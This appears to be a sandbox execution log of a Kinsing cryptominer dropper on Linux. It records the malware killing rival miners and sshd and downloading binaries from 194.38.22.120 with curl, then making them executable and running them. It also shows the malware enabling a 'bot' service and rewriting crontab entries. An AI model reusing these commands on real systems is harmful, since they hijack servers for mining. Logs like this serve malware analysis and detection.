/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1438
-
-
/usr/bin/idid -u2⤵PID:1439
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1440 -
/usr/sbin/sendmailsendmail -t3⤵PID:1443
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGE0-0000NH-TZ4⤵
- Reads CPU attributes
PID:1456
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1446
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGE0-0000NK-U44⤵
- Reads CPU attributes
PID:1457
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1447
-
-
-
/usr/bin/idid -u2⤵PID:1448
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1449
-
-
/bin/unameuname -m2⤵PID:1450
-
-
/bin/lsls -la /etc/data2⤵PID:1452
-
-
/bin/grepgrep -e /dev2⤵PID:1453
-
-
/bin/grepgrep -v grep2⤵PID:1454
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1455
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1458
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1460
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1461
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1463
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1465
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1467
-
-
/bin/grepgrep -v -2⤵PID:1472
-
-
/bin/grepgrep :14142⤵PID:1469
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1470
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1471
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1473
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1476
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1478
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1477
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1474
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1483
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1482
-
-
/bin/grepgrep -v grep2⤵PID:1481
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1479
-
-
/bin/grepgrep stratum2⤵PID:1480
-
-
/bin/grepgrep Sofia2⤵PID:1485
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1484
-
-
/bin/grepgrep -v grep2⤵PID:1486
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1487
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1488
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1489
-
-
/bin/grepgrep -v grep2⤵PID:1492
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1494
-
-
/bin/grepgrep tracepath2⤵PID:1491
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1499
-
-
/bin/grepgrep /dot2⤵PID:1496
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1503
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1501
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1504
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1500
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1506
-
-
/bin/grepgrep -v grep2⤵PID:1507
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1508
-
-
/bin/grepgrep "bash -k"2⤵PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1512
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1510
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1513
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1514
-
-
/bin/grepgrep perfctl2⤵PID:1516
-
-
/bin/grepgrep -v grep2⤵PID:1517
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1518
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1515
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1519
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1520
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1521
-
-
/bin/grepgrep -v grep2⤵PID:1524
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1526
-
-
/bin/grepgrep ./ll12⤵PID:1523
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1522
-
-
/bin/grepgrep -v grep2⤵PID:1529
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1531
-
-
/bin/grepgrep agetty2⤵PID:1528
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1530
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1527
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads runtime system information
PID:1532
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1535
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1536
-
-
/bin/grepgrep 207.38.87.62⤵PID:1534
-
-
/bin/grepgrep -v -2⤵PID:1537
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1538
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1541
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1540
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1542
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1544
-
-
/bin/grepgrep -v -2⤵PID:1543
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1547
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1546
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1548
-
-
/bin/grepgrep -v -2⤵PID:1549
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1550
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1552
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1553
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1554
-
-
/bin/grepgrep -v -2⤵PID:1555
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1556
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1559
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1558
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1560
-
-
/bin/grepgrep -v -2⤵PID:1561
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1562
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1563
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1564
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1566
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1567
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1570
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1575
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1586
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1589
-
-
/bin/grepgrep -v grep2⤵PID:1592
-
-
/bin/grepgrep ./udp2⤵PID:1591
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1593
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1594
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1590
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1597
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1598
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1600
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1599
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1602
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1605
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1608
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1610
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1612
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1611
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1613
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1614
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1615
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1621
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1620
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/catcat /data/./oka.pid2⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1626
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1628
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1630
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1629
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1632
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1633
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1634
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1635
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1636
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1637
-
-
/bin/grepgrep -v grep2⤵PID:1640
-
-
/bin/grepgrep ./oka2⤵PID:1639
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1638
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1641
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1642
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1646
-
-
/bin/grepgrep -v grep2⤵PID:1645
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1644
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1647
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1643
-
-
/bin/grepgrep -v bin2⤵PID:1650
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1649
-
-
/bin/grepgrep -v "\\["2⤵PID:1651
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1648
-
-
/bin/grepgrep -v "("2⤵PID:1652
-
-
/bin/grepgrep -v php-fpm2⤵PID:1653
-
-
/bin/grepgrep -v proxymap2⤵PID:1654
-
-
/bin/grepgrep -v postgres2⤵PID:1655
-
-
/bin/grepgrep -v postgrey2⤵PID:1656
-
-
/bin/grepgrep -v kinsing2⤵PID:1657
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1658
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1659
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1661
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1660
-
-
/bin/grepgrep -v bin2⤵PID:1662
-
-
/bin/grepgrep -v "\\["2⤵PID:1663
-
-
/bin/grepgrep -v "("2⤵PID:1664
-
-
/bin/grepgrep -v php-fpm2⤵PID:1665
-
-
/bin/grepgrep -v proxymap2⤵PID:1666
-
-
/bin/grepgrep -v postgres2⤵PID:1667
-
-
/bin/grepgrep -v postgrey2⤵PID:1668
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1669
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1670
-
-
/bin/grepgrep -v bin2⤵PID:1673
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1672
-
-
/bin/grepgrep -v "\\["2⤵PID:1674
-
-
/bin/grepgrep -v "("2⤵PID:1675
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1671
-
-
/bin/grepgrep -v php-fpm2⤵PID:1676
-
-
/bin/grepgrep -v proxymap2⤵PID:1677
-
-
/bin/grepgrep -v postgres2⤵PID:1678
-
-
/bin/grepgrep -v postgrey2⤵PID:1679
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1681
-
-
/bin/grepgrep -v grep2⤵PID:1683
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1684
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1682
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1685
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1686
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1690
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1689
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1691
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1692
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1693
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1694
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1698
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1697
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1701
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1702
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1703
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1704
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1708
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1709
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1710
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1711
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1712
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1715
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1716
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1717
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1718
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1719
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1720
-
-
/usr/bin/idid -u2⤵PID:1722
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1723
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1736
-
-
/bin/sedsed /base64/d2⤵PID:1741
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1740
-
-
/bin/sedsed /_cron/d2⤵PID:1744
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1745
-
-
/usr/bin/crontabcrontab -l2⤵PID:1743
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1748
-
-
/usr/bin/crontabcrontab -l2⤵PID:1746
-
-
/bin/sedsed /update.sh/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/bin/sedsed /logo4/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/bin/sedsed /logo9/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/bin/sedsed /logo0/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/bin/sedsed /logo/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /tor2web/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/bin/sedsed /jpg/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/bin/sedsed /png/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/bin/sedsed /tmp/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/bin/sedsed /pastebin/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /onion/d2⤵
- Reads runtime system information
PID:1789
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/bin/sedsed /shuf/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/bin/sedsed /ash/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/bin/sedsed /mr.sh/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /github/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1822
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1825
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1834
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
/bin/sedsed /update.sh/d2⤵PID:1849
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1850
-
-
/usr/bin/crontabcrontab -l2⤵PID:1848
-
-
